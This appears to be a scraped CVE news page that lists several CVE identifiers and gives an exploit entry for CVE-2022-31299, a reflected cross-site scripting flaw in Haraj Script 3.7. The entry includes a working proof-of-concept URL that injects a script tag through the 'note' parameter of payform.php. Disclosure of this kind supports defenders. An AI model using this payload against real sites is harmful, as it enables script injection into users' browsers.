CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.

**CVE-2022-31299**

Haraj Script 3.7 - Reflected XSS

**Exploit Title: Haraj Script 3.7 - Reflected XSS****Date: 2022-06-13****CVE: CVE-2022-31299****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://angtech.org/****Software Link: https://angtech.org/product/view/3****Version: 3.7****Tested on: LAMP, Ubuntu**

\[#\] Exploitation : https://localhost/harajnext/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(String.fromCharCode(98,52,122,98,48,122))%3C/script%3E

Headline

CVE-2022-31299: GitHub - bigzooooz/CVE-2022-31299: Haraj Script 3.7 - Reflected XSS

CVE: Latest News